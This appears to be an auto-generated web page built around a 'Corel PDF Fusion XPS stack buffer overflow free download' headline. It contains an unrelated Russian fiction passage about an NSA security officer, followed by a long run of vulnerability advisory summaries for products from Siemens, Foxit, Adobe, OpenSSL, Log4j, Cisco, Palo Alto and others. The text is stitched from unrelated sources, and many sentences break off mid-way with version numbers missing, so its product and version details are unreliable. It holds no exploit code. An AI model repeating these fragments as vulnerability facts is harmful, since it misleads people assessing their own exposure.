Stack-based buffer overflow in Corel PDF Fusion allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a. – EXPLOIT-KIT Styx exploit kit fonts download page – FILE-OTHER Corel PDF fusion XPS stack buffer overflow attempt.
 
 

Corel pdf fusion xps stack buffer overflow vulnerability free download.Update Details

 

Сотрудникам службы безопасности платили за их техническое мастерство… а также за чутье. Действуй, объясняться будешь. Чатрукьян знал, что ему делать.

Знал он и то, что, когда пыль осядет, он либо станет героем АНБ, либо пополнит ряды тех, кто ищет работу. В огромной дешифровальной машине завелся вирус – в этом он был абсолютно уверен.

 

Corel pdf fusion xps stack buffer overflow vulnerability free download

 

This reflected cross-site scripting attack can be used to non-permanently deface or modify displayed content of portal Website. The Simple Diagnostics Agent – versions 1. Due to lack of authentication checks, an attacker could access administrative or other privileged functionalities and read, modify, or delete sensitive information and configurations.

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader Foxit reader The specific flaw exists within the handling of XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object.

The specific flaw exists within the parsing of JP2 images. Crafted data in a JP2 image can trigger a write past the end of an allocated buffer. The specific flaw exists within the handling of AcroForms. The specific flaw exists within the parsing of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. By performing actions in JavaScript, an attacker can trigger a read past the end of an allocated buffer.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader Foxit reader The specific flaw exists within the OnMouseExit method. If an entity has an association readable by the user, then in some cases, Mendix Runtime may not apply checks for XPath constraints that parse said associations, within apps running on affected versions.

A malicious user could use this to dump and manipulate sensitive data. The tcserver. An authenticated attacker could escape the WinCC Kiosk Mode by opening the printer dialog in the affected application in case no printer is installed. Due to insecure deserialization of user-supplied content by the affected software, a privileged attacker could exploit this vulnerability by sending a maliciously crafted serialized Java object. This could allow the attacker to execute arbitrary code on the device with root privileges.

A privileged authenticated attacker could execute arbitrary commands in the local database by sending specially crafted requests to the webserver of the affected application. An attacker could then be able to sniff the network and capture sensitive information. The login functionality of the application does not employ any countermeasures against Password Spraying attacks or Credential Stuffing attacks. An attacker could obtain a list of valid usernames on the device by exploiting the issue and then perform a precise Password Spraying or Credential Stuffing attack in order to obtain access to at least one account.

The login functionality of the application fails to normalize the response times of login attempts performed with wrong usernames with the ones executed with correct usernames. A remote unauthenticated attacker could exploit this side-channel information to perform a username enumeration attack and identify valid usernames. The web application returns an AuthToken that does not expire at the defined auto logoff delay timeout.

An attacker could be able to capture this token and re-use old session credentials or session IDs for authorization. An attacker with user profile access privilege can retrieve the stored password hashes of other accounts and then successfully perform an offline cracking attack and recover the plaintext passwords of other users. The web application fails to enforce an upper bound to the cost factor of the PBKDF2 derived key during the creation or update of an account.

An attacker with the user profile access privilege could cause a denial of service DoS condition through CPU consumption by setting a PBKDF2 derived key with a remarkably high cost effort and then attempting a login to the so-modified account.

The affected system allows remote users to send maliciously crafted objects. Due to insecure deserialization of user-supplied content by the affected software, an unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted serialized object.

Affected applications improperly assign permissions to critical directories and files used by the application processes. If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in Honeywell SoftMaster version 4. A local unprivileged attacker may escalate to administrator privileges in Honeywell SoftMaster version 4.

The integrated web application “Online Help” in affected product contains a Cross-Site Scripting XSS vulnerability that could be exploited if unsuspecting users are tricked into accessing a malicious link.

Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.

However, the nature of the vulnerability is more general, and there may be other ways to exploit it. A memory corruption issue was addressed with improved state management.

This issue is fixed in watchOS 8. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. Simple Diagnostics Agent – versions 1. This allows information gathering which could be used exploit future open-source security exploits.

A feature was introduced in version 3. Knowing the proper format of the URL and the identifier of an existing object in an application it is possible to get access to that object without being logged in, even if the object is not shared, resulting in the opportunity for malicious exfiltration of user data. A specially-crafted PDF document can trigger an exception which is improperly handled, leaving the engine in an invalid state, which can lead to memory corruption and arbitrary code execution.

An attacker needs to trick the user to open the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.

Navigating to a specific URL with a patient ID number will result in the server generating a PDF of a lab report without authentication and rate limiting. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack.

The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: – TLS clients consuming server certificates – TLS servers consuming client certificates – Hosting providers taking certificates or private keys from customers – Certificate authorities parsing certification requests from subscribers – Anything else which parses ASN. In the OpenSSL 1. However any operation which requires the public key from the certificate will trigger the infinite loop.

In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1. It was addressed in the releases of 1. Fixed in OpenSSL 3. Fixed in OpenSSL 1. Affected application contains a stack based buffer overflow vulnerability while parsing specially crafted BDF files. The specific flaw exists within the parsing of PDF files.

Crafted data in a PDF file can trigger a read past the end of an allocated buffer. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. The component allows to activate a web server module which provides unauthenticated access to its web pages. This could allow an attacker to retrieve debug-level information from the component such as internal network topology or connected systems.

Affected application contains an out of bounds write past the end of an allocated structure while parsing specially crafted NEU files. A vulnerability has been identified in Simcenter Femap V Affected application contains a stack based buffer overflow vulnerability while parsing NEU files.

Affected application contains a memory corruption vulnerability while parsing NEU files. Affected application contains a type confusion vulnerability while parsing NEU files. In the IPv4 implementation in the Linux kernel before 5. In the IPv6 implementation in the Linux kernel before 5.

A service is started by an unquoted registry entry. As there are spaces in this path, attackers with write privilege to those directories might be able to plant executables that will run in place of the legitimate process. Attackers might achieve persistence on the system “backdoors” or cause a denial of service.

Affected applications use a circumventable access control within a database service. This could allow an attacker to access the database. Apache Log4j2 versions 2. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted.

This issue was fixed in Log4j 2. Log4j 2. The web server of the affected system allows access to logfiles and diagnostic data generated by a privileged user. An unauthenticated attacker could access the files by knowing the corresponding download links. An undocumented debug port uses hard-coded default credentials. If this port is enabled by a privileged user, an attacker aware of the credentials could access an administrative debug shell on the affected device.

Acrobat Reader DC version Acrobat Reader DC displays a warning message when a user clicks on a PDF file, which could be used by an attacker to mislead the user.

In affected versions, this warning message does not include custom protocols when used by the sender. User interaction is required to abuse this vulnerability as they would need to click ‘allow’ on the warning message of a malicious file. A vulnerability has been identified in SiPass integrated V2. Affected applications insufficiently limit the access to the internal user authentication service.

This could allow an unauthenticated remote attacker to trigger several actions on behalf of valid user accounts. Affected applications insufficiently limit the access to the internal activity feed database. This could allow an unauthenticated remote attacker to read, modify or delete activity feed entries. Affected applications insufficiently limit the access to the internal message broker system. This could allow an unauthenticated remote attacker to subscribe to arbitrary message queues.

A cross-site scripting is present due to improper neutralization of data sent to the web page through the SVN WebClient in the affected product. An attacker could exploit this to execute arbitrary code and extract sensitive information by sending a specially crafted link to users with administrator privileges. JTTK library in affected products is vulnerable to an out of bounds read past the end of an allocated buffer when parsing JT files.

JTTK library in affected products contains an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. JTTK library in affected products contains a use-after-free vulnerability that could be triggered while parsing specially crafted JT files. JTTK library in affected products contains an out of bounds write past the fixed-length heap-based buffer while parsing specially crafted JT files. JTTK library in affected products is vulnerable to an out of bounds read past the end of an allocated buffer when parsing specially crafted JT files.

JTTK library in affected products is vulnerable to memory corruption condition while parsing specially crafted JT files.

JTTK library in affected products is vulnerable to an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. JTTK library in affected products is vulnerable to stack based buffer overflow while parsing specially crafted JT files. JTTK library in affected products contains a use after free vulnerability that could be triggered while parsing specially crafted JT files.

Apache Log4j2 2. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2. From version 2. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. The underlying MQTT service of affected systems does not perform authentication in the default configuration. This could allow an unauthenticated remote attacker to send arbitrary messages to the service and thereby issue arbitrary requests in the affected system.

The affected systems do not properly validate input that is sent to the underlying message passing framework. This could allow an remote attacker to trigger a denial of service of the affected system. The affected firmware contains a buffer overflow vulnerability in the web application that could allow a remote attacker with engineer or admin priviliges to potentially perform remote code execution.

The plmxmlAdapterSE The Image. The Jt The DLpdfl. This could allow an attacker to cause a denial-of-service condition.

In Mahara before Additional, in Mahara before An attacker could achieve privilege escalation on the web server of certain devices due to improper access control vulnerability in the engineering system software. The attacker needs to have direct access to the impacted web server. The affected software does not properly validate the server certificate when initiating a TLS connection. This could allow an attacker to spoof a trusted entity by interfering in the communication path between the client and the intended server.

Applications built with affected versions of Mendix Studio Pro do not properly control read access for certain client actions. This could allow authenticated attackers to retrieve the changedDate attribute of arbitrary objects, even when they don’t have read access to them. Applications built with affected versions of Mendix Studio Pro do not properly control write access for certain client actions.

This could allow authenticated attackers to manipulate the content of System. FileDocument objects in some cases, regardless whether they have write access to it. This could result in an out of bounds write past the end of an allocated structure. The RSA white-box implementation in affected applications insufficiently protects the built-in private keys that are required to decrypt electronic intellectual property IP data in accordance with the IEEE recommended practice.

This could allow a sophisticated attacker to discover the keys, bypassing the protection intended by the IEEE recommended practice. When downloading files, the affected systems do not properly neutralize special elements within the pathname. An attacker could then cause the pathname to resolve to a location outside of the restricted directory on the server and read unexpected critical files.

The affected file download function is disabled by default. An unauthenticated remote attacker could exploit this issue to access sensitive information for subsequent attacks. The third-party component, in its TFTP functionality fails to check for null terminations in file names. If an attacker were to exploit this, it could result in data corruption, and possibly a hard-fault of the application.

Within a third-party component, the process to allocate partition size fails to check memory boundaries. Therefore, if a large amount is requested by an attacker, due to an integer-wrap around, it could result in a small size being allocated instead. Within a third-party component, whenever memory allocation is requested, the out of bound size is not checked.

Therefore, if size exceeding the expected allocation is assigned, it could allocate a smaller buffer instead. If an attacker were to exploit this, they could cause a heap overflow. If an attacker were to exploit this, they could act as a man-in-the-middle and eavesdrop on encrypted communications.

A timing attack, in a third-party component, could make the retrieval of the private key possible, used for encryption of sensitive data. If a threat actor were to exploit this, the data integrity and security could be compromised.

Applications built with affected versions of Mendix Studio Pro do not prevent file documents from being cached when files are opened or downloaded using a browser. This could allow a local attacker to read those documents by exploring the browser cache. An improper input validation vulnerability in the web server could allow an unauthenticated user to access device information. A vulnerability has been identified in Teamcenter Active Workspace V4. The application contains an unsafe unzipping pattern that could lead to a zip path traversal attack.

This could allow and attacker to execute a remote shell with admin rights. Affected devices write crashdumps without checking if enough space is available on the filesystem. Once the crashdump fills the entire root filesystem, affected devices fail to boot successfully. An attacker can leverage this vulnerability to cause a permanent Denial-of-Service.

The handling of log files in the web application of affected devices contains an information disclosure vulnerability which could allow logged in users to access sensitive files. The affected application contains a use-after-free vulnerability while parsing OBJ files. The affected application is vulnerable to information disclosure by unexpected access to an uninitialized pointer while parsing user-supplied OBJ files.

The affected application is vulnerable to an out of bounds read past the end of an allocated buffer when parsing JT files. An attacker could leverage this vulnerability to leak information in the context of the current process ZDI-CAN Adobe Acrobat Reader DC version An attacker could leverage this vulnerability to bypass mitigations such as ASLR.

A specially-crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. This could allow an attacker to create a Denial-of-Service condition. A restart is needed to restore normal operations. The web server of affected devices transmits data without TLS encryption. This could allow an unauthenticated remote attacker in a man-in-the-middle position to read sensitive data, such as administrator credentials, or modify data in transit.

The affected systems store sensitive information in log files. An attacker with access to the log files could publicly expose the information or reuse it to develop further attacks on the system. The affected component stores the credentials of a local system account in a potentially publicly accessible project file using an outdated cipher algorithm.

An attacker may use this to brute force the credentials and take over the system. The password hash of a local user account in the remote server could be granted via public API to a user on the affected system. An authenticated attacker could brute force the password hash and use it to login to the server.

Legitimate file operations on the web server of the affected systems do not properly neutralize special elements within the pathname. An attacker could then cause the pathname to resolve to a location outside of the restricted directory on the server and read, write or delete unexpected critical files. A path traversal vulnerability in the application could allow an attacker to bypass certain restrictions such as direct access to other services within the host. The affected application contains Insecure Direct Object Reference IDOR vulnerability that allows an attacker to use user-supplied input to access objects directly.

The “surrogate” functionality on the user profile of the application does not perform sufficient access control that could lead to an account takeover. An attacker can write to an arbitrary file, and display controlled contents, during signature verification. PDFTron prior to 9. This vulnerability can be exploited to execute arbitrary code.

An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Exploitation requires user interaction in that a victim must open a crafted PDF file in Acrobat Reader. Adobe Framemaker versions Update 8 and earlier and Release Update 2 and earlier are affected by a use-after-free vulnerability in the processing of a malformed PDF file that could result in disclosure of sensitive memory. Adobe Framemaker versions Update 8 and earlier and Release Update 2 and earlier are affected by a memory corruption vulnerability due to insecure handling of a malicious PDF file, potentially resulting in arbitrary code execution in the context of the current user.

User interaction is required to exploit this vulnerability. Adobe Framemaker versions Update 8 and earlier and Release Update 2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

It allows memory corruption during conversion of a PDF document to a different document format. It allows stack consumption during recursive processing of embedded XML nodes. It allows writing to arbitrary files via submitForm. It allows an out-of-bounds read via util. Corel PDF Fusion 2. PDF Labs pdftk-java v3. Any authenticated user can create scheduled reports containing PDF screenshots of any view in the NagiosXI application. Due to lack of input sanitisation, the target page can be replaced with an SSRF payload to access internal resources or disclose local system files.

The SSH server on affected devices is configured to offer weak ciphers by default. This could allow an unauthorized attacker in a man-in-the-middle position to read and modify any data passed over the connection between legitimate clients and the affected device.

Improper neutralization of special characters on the web server configuration page could allow an attacker, in a privileged position, to retrieve sensitive information via cross-site scripting. The affected application assigns improper access rights to a specific folder containing configuration files.

Received webpackets are not properly processed. An unauthenticated remote attacker with access to any of the Ethernet interfaces could send specially crafted packets to force a restart of the target device. A restart of the affected device is needed to restore normal operations.

The plmxmlAdapterIFC. This could allow an attacker to cause a denial-of-service condition or read sensitive information from memory locations. The IFC adapter in affected application contains a use-after-free vulnerability that could be triggered while parsing user-supplied IFC files. This could allow an attacker to manipulate the SINEC NMS configuration by tricking an unsuspecting user with administrative privileges to click on a malicious link.

An attacker with access to the webserver of an affected system could download arbitrary files from the underlying filesystem by sending a specially crafted HTTP request. An attacker could exploit this vulnerability to perform cross-site request forgery attacks. This could allow an attacker to execute arbitrary SQL statements. This could allow an attacker to inject malicious code that is executed when loading the attachment. This could allow an attacker to store malicious files.

An unauthenticated attacker in the same network of the affected system could manipulate certain parameters and set a valid user of the affected software as invalid or vice-versa. The affected software has an information disclosure vulnerability that could allow an attacker to retrieve a list of network devices a known user can manage. An unauthenticated attacker in the same network of the affected system could brute force the usernames from the affected software. The affected software has an information disclosure vulnerability that could allow an attacker to retrieve VPN connection for a known user.

A vulnerability has been identified in LOGO! An adjacent attacker with network access to the LAN interface could interfere with traffic, spoof the connection and gain access to sensitive information. An unauthenticated attacker could change the the password of any user in the system under certain circumstances. With this an attacker could impersonate any valid user on an affected system.

The affected software allows sending send-to-sleep notifications to the managed devices. An unauthenticated attacker in the same network of the affected system can abuse these notifications to cause a Denial-of-Service condition in the managed devices. An unauthenticated remote attacker could exploit this vulnerability to cause interruptions in the network by sending specially crafted OSPF packets.

Successful exploitation requires OSPF to be enabled on an affected device. The application deserialises untrusted data without sufficient validations, that could result in an arbitrary deserialization. This could allow an unauthenticated attacker to execute code in the affected system. An XML external entity injection vulnerability in the underlying XML parser could cause the affected application to disclose arbitrary files to remote attackers by loading a specially crafted xml file.

The status provided by the syslog clients managed by the affected software can be manipulated by an unauthenticated attacker in the same network of the affected system. The femap. This could result in an out of bounds read past the end of an allocated buffer. The affected devices do not properly handle permissions to traverse the file system.

There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user.

Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file. Corel DrawStandard An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.

FLT in Corel Presentations This is different from CVE If an attacker specifies a Content-Length size of or larger, this integer arithmetic will wrap the value back around to smaller integer, then calls “calloc” with this size to allocate memory.

This vulnerability affected SMA , , , and v appliances. A Heap-based buffer overflow vulnerability in SonicWall SMA getBookmarks method allows a remote authenticated attacker to potentially execute code as the nobody user in the appliance. This vulnerability affected SMA , , , and v appliances firmware A buffer overflow may result in arbitrary code execution. A logic issue was addressed with improved state management.

Multiple vulnerabilities in Cisco SD-WAN vEdge Software could allow an attacker to execute arbitrary code as the root user or cause a denial of service DoS condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. The vulnerability is due to incorrect boundary checks of certain values in Easy VSS protocol packets that are destined for an affected device.

An attacker could exploit this vulnerability by sending crafted Easy VSS protocol packets to UDP port while the affected device is in a specific state. When the crafted packet is processed, a buffer overflow condition may occur. A successful exploit could allow the attacker to trigger a denial of service DoS condition or execute arbitrary code with root privileges on the underlying Linux operating system of the affected device.

Product: AndroidVersions: Android Android User interaction is needed for exploitation. Product: AndroidVersions: Android By continuously sending this specific packets, an attacker can repeatedly crash the radius daemon, causing a sustained Denial of Service DoS.

A buffer size validation vulnerability in the overlayd service of Juniper Networks Junos OS may allow an unauthenticated remote attacker to send specially crafted packets to the device, triggering a partial Denial of Service DoS condition, or leading to remote code execution RCE.

Continued receipt and processing of these packets will sustain the partial DoS. The overlayd daemon handles Overlay OAM packets, such as ping and traceroute, sent to the overlay. The service runs as root by default and listens for UDP connections on port This issue results from improper buffer size validation, which can lead to a buffer overflow.

Unauthenticated attackers can send specially crafted packets to trigger this vulnerability, resulting in possible remote code execution. On SRX Series devices configured with UTM services a buffer overflow vulnerability in the Packet Forwarding Engine PFE of Juniper Networks Junos OS may allow an attacker to arbitrarily execute code or commands on the target to take over or otherwise impact the device by sending crafted packets to or through the device.

This issue is fixed in watchOS 7. Playing a malicious audio file may lead to arbitrary code execution. This issue is fixed in macOS Catalina Adobe Character Animator versions 3. Adobe Bridge versions Firmware developed by Shenzhen Hichip Vision Technology V6 through V20, after through , as used by many different vendors in millions of Internet of Things devices, suffers from buffer overflow vulnerability that allows unauthenticated remote attackers to execute arbitrary code via the peer-to-peer P2P service.

The software access data past the end, or before the beginning, of the intended buffer when handling certain operations of certificate, the attacker should trick the user into installing a malicious application, successful exploit may cause code execution. There is a buffer overflow vulnerability in several Huawei products.

The system does not sufficiently validate certain configuration parameter which is passed from user that would cause buffer overflow. The attacker should trick the user into installing and running a malicious application with a high privilege, successful exploit may cause code execution. There is a vulnerability with buffer access with incorrect length value in some Huawei Smartphone. Unauthorized users may trigger code execution when a buffer overflow occurs.

An attacker induces users to install malicious applications and sends specially constructed packets to affected devices after obtaining the root permission. Successful exploit may cause code execution. Due to insufficient input validation, an unauthenticated attacker may craft Bluetooth messages after successful paring, causing buffer overflow. There is a buffer overflow vulnerability in some Huawei products. The vulnerability can be exploited by an attacker to perform remote code execution on the affected products when the affected product functions as an optical line terminal OLT.

An unauthenticated, unauthorized attacker sending a specially crafted MMS to a vulnerable phone can trigger a heap-based buffer overflow in the Quram image codec leading to an arbitrary remote code execution RCE without any user interaction. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the xHCI component. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor.

A remote attacker can execute arbitrary code. The vulnerability function is enabled when the streamer service related to the AfreecaTV communicated through web socket using port. A stack-based buffer overflow leading to remote code execution was discovered in strcpy operate by “FanTicket” field. It is because of stored data without validation of length. Spamsniper 5. It leads remote attacker to execute arbitrary code via crafted packet. A vulnerability has been identified in LOGO!

A buffer overflow vulnerability exists in the Web Server functionality of the device. A remote unauthenticated attacker could send a specially crafted HTTP request to cause a memory corruption, potentially resulting in remote code execution.

In FreeBSD A local authenticated buffer overflow vulnerability was discovered in Aruba ClearPass Policy Manager version s : Prior to 6. A vulnerability in ClearPass OnGuard could allow local authenticated users to cause a buffer overflow condition.

A successful exploit could allow a local attacker to execute arbitrary code within the context the binary is running in, which is a lower privileged account. This can cause a heap-based buffer overflow or other out-of-bounds access which can lead to a DoS or potential execute arbitrary code. In Moxa PT series firmware, Version 4. An exploitable code execution vulnerability exists in the rendering functionality of Nitro Pro When drawing the contents of a page and selecting the stroke color from an ‘ICCBased’ colorspace, the application will read a length from the file and use it as a loop sentinel when writing data into the member of an object.

Due to the object member being a buffer of a static size allocated on the heap, this can result in a heap-based buffer overflow. A specially crafted document must be loaded by a victim in order to trigger this vulnerability. An exploitable vulnerability exists in the object stream parsing functionality of Nitro Software, Inc.

When processing an object stream from a PDF document, the application will perform a calculation in order to allocate memory for the list of indirect objects. Due to an error when calculating this size, an integer overflow may occur which can result in an undersized buffer being allocated.

Later when initializing this buffer, the application can write outside its bounds which can cause a memory corruption that can lead to code execution.

A specially crafted document can be delivered to a victim in order to trigger this vulnerability. Fsck 1. A specially crafted f2fs filesystem can cause a heap buffer overflow resulting in a code execution.

An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer A specially crafted file can cause a heap buffer overflow resulting in a code execution.

An exploitable code execution vulnerability exists in the ANI file format parser of Leadtools A specially crafted ANI file can cause a buffer overflow resulting in remote code execution. Valve’s Game Networking Sockets prior to version v1. Philips Hue Bridge model 2. X prior to and including version contains a Heap-based Buffer Overflow when handling a long ZCL string during the commissioning phase, resulting in a remote code execution.

Amcrest cameras and NVR are vulnerable to a stack-based buffer overflow over port An authenticated remote attacker can abuse this issue to crash the device and possibly execute arbitrary code.

An unauthenticated remote attacker may exploit this vulnerability to crash the affected process or execute arbitrary code on the system by sending specially crafted input data.

In NetHack before 3. Users should upgrade to NetHack 3. It’s been found that multiple functions in ipmitool before 1. This is especially dangerous if ipmitool is run as a privileged user. This problem is fixed in version 1. A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service DoS and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.

A local attacker could overflow a buffer and execute arbitrary code on the system or cause the system to crash. Certain IBM Aspera applications are vulnerable to buffer overflow after valid authentication, which could allow an attacker with intimate knowledge of the system to execute arbitrary code through a service. Certain IBM Aspera applications are vulnerable to buffer overflow based on the product configuration and valid authentication, which could allow an attacker with intimate knowledge of the system to execute arbitrary code or perform a denial-of-service DoS through the http fallback service.

Certain IBM Aspera applications are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. This could allow a remote attacker with intimate knowledge of the server to execute arbitrary code on the system with the privileges of root or cause server to crash. IBM Spectrum Protect 7.

This could allow a remote attacker to execute arbitrary code on the system with the privileges of an administrator or user associated with the Spectrum Protect server or cause the Spectrum Protect server to crash. By sending a specially crafted HTTP request, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause a denial of service.

A successful exploit could enable an attacker to crash Notes or execute attacker-controlled code on the client system. In HCL Notes version 9 previous to release 9. This could enable an attacker to crash HCL Notes or execute attacker-controlled code on the client. The xrdp-sesman service before version 0. Once the xrdp-sesman process is dead, an unprivileged attacker on the server could then proceed to start their own imposter sesman service listening on port This will allow them to capture any user credentials that are submitted to XRDP and approve or reject arbitrary login credentials.

For xorgxrdp sessions in particular, this allows an unauthorized user to hijack an existing session. This is a buffer overflow attack, so there may be a risk of arbitrary code execution as well. Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution.

Adobe Acrobat and Reader versions A specially crafted TIFF file can lead to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

A vulnerability in Cisco FXOS Software could allow an authenticated, local attacker with administrative credentials to cause a buffer overflow condition. The vulnerability is due to incorrect bounds checking of values that are parsed from a specific file.

An attacker could exploit this vulnerability by supplying a crafted file that, when it is processed, may cause a stack-based buffer overflow. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges.

An attacker would need to have valid administrative credentials to exploit this vulnerability. Multiple vulnerabilities in the API subsystem of Cisco Integrated Management Controller IMC could allow an unauthenticated, remote attacker to execute arbitrary code with root privileges. The vulnerabilities are due to improper boundary checks for certain user-supplied input.

When this request is processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying operating system OS. A vulnerability in the implementation of the Lua interpreter that is integrated in Cisco IOS XE Software could allow an authenticated, local attacker to execute arbitrary code with root privileges on the underlying Linux operating system OS of an affected device.

The vulnerability is due to insufficient restrictions on Lua function calls within the context of user-supplied Lua scripts. An attacker with valid administrative credentials could exploit this vulnerability by submitting a malicious Lua script. When this file is processed, an exploitable buffer overflow condition could occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying Linux OS of the affected device.

The vulnerability exists because of insufficiently validated Cisco Discovery Protocol packet headers. An attacker could exploit this vulnerability by sending a crafted Cisco Discovery Protocol packet to a Layer 2-adjacent affected device. A successful exploit could allow the attacker to cause a buffer overflow that could allow the attacker to execute arbitrary code as root or cause a DoS condition on the affected device.

Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device Layer 2 adjacent. A buffer overflow in the web server of Flexense DupScout Enterprise A buffer overflow in the web interface allows attackers to achieve pre-authentication remote code execution.

A stack-based buffer overflow vulnerability in FortiWeb 6. A specially crafted STL file can lead to code execution. A stack-based buffer overflow vulnerability exists in the Objparser::objparse functionality of Prusa Research PrusaSlicer 2.

A specially crafted obj file can lead to code execution. A heap-based buffer overflow vulnerability exists in the configuration server functionality of the Cosori Smart 5. A specially crafted JSON object can lead to remote code execution. A heap-based buffer overflow privilege escalation vulnerability in Trend Micro ServerProtect for Linux 3.

An attacker must first obtain the ability to execute high-privileged code on the target in order to exploit this vulnerability. Affected applications lack proper validation of user-supplied data when parsing PAR files. This could lead to a stack based buffer overflow. This affects Rv2 V1. An issue was discovered on Samsung mobile devices with Q Exim 4 before 4. A heap-buffer overflow was found in the way openjpeg2 handled certain PNG format files. An attacker could use this flaw to cause an application crash or in some cases execute arbitrary code with the permission of the user running such an application.

The affected product is vulnerable to a heap-based buffer overflow, which may allow an attacker to manipulate memory with controlled values and remotely execute code on the OPC UA Tunneller versions prior to 6. Opening a specifically crafted OPC UA message could allow an attacker to crash the server and remotely execute code. Affected applications lack proper validation of user-supplied data when parsing of PCX files.

Affected applications lack proper validation of user-supplied data when parsing CGM files. This could lead to a stack based buffer overflow while trying to copy to a buffer in the font index handling function. This could lead to a stack based buffer overflow while trying to copy to a buffer during font string handling. Affected applications lack proper validation of user-supplied data when parsing of TGA files. This could lead to a heap-based buffer overflow.

Affected applications lack proper validation of user-supplied data when parsing of JT files. This has been fixed in version: ICW v3. Successful exploitation leads to arbitrary code execution. The impact is: execute arbitrary code remote. The attack vector is: a specific DNS response packet. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake.

The attacker needs to know the network’s PSK in order to exploit this. A flaw was found in dnsmasq before version 2. This flaw allows a remote attacker, who can create valid DNS replies, to cause an overflow in a heap-allocated memory. This flaw is caused by the lack of length checks in rfc The highest threat from this vulnerability is to system availability.

A remote attacker, who can create valid DNS replies, could use this flaw to cause an overflow in a heap-allocated memory. A flaw was found in dnsmasq before 2. An attacker on the network, who can create valid DNS replies, could use this flaw to cause an overflow with arbitrary data in a heap-allocated memory, possibly executing code on the machine. The flaw is in the rfc The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

An issue was discovered on Samsung mobile devices with O 8. The baseband component has a buffer overflow via an abnormal SETUP message, leading to execution of arbitrary code.

Opening a specially crafted project file could allow an attacker to exploit and execute code under the privileges of the application. The affected product is vulnerable to three stack-based buffer overflows, which may allow an unauthenticated attacker to remotely execute arbitrary code on the IP firmware versions 5. The affected product is vulnerable to five post-authentication buffer overflows, which may allow a logged in user to remotely execute arbitrary code on the IP firmware versions 5.

This allows remote takeover of a Furbo Dog Camera, for example. Buffer overflow in Yz1 0. Buffer Overflow vulnerability in FFMpeg 4. An issue was discovered in retdec v3. Buffer overflow vulnerability in function NumberToPrecisionCmd in jsish before 3. Buffer Overflow vulnerability in FFmpeg 4. A stack-based buffer overflow in the httpd server on Tenda AC9 V A buffer overflow vulnerability in the PAN-OS management web interface allows authenticated administrators to disrupt system processes and potentially execute arbitrary code with root privileges.

A buffer overflow vulnerability in PAN-OS allows an unauthenticated attacker to disrupt system processes and potentially execute arbitrary code with root privileges by sending a malicious request to the Captive Portal or Multi-Factor Authentication interface. An unauthenticated stack-based buffer overflow vulnerability in common.

A buffer overflow vulnerability in the authd component of the PAN-OS management server allows authenticated administrators to disrupt system processes and potentially execute arbitrary code with root privileges.

A buffer overflow vulnerability in the PAN-OS management server allows authenticated users to crash system processes or potentially execute arbitrary code with root privileges. A stack-based buffer overflow vulnerability in the management server component of PAN-OS that allows an authenticated user to potentially execute arbitrary code with root privileges. A stack-based buffer overflow vulnerability in the management server component of PAN-OS allows an authenticated user to upload a corrupted PAN-OS configuration and potentially execute code with root privileges.

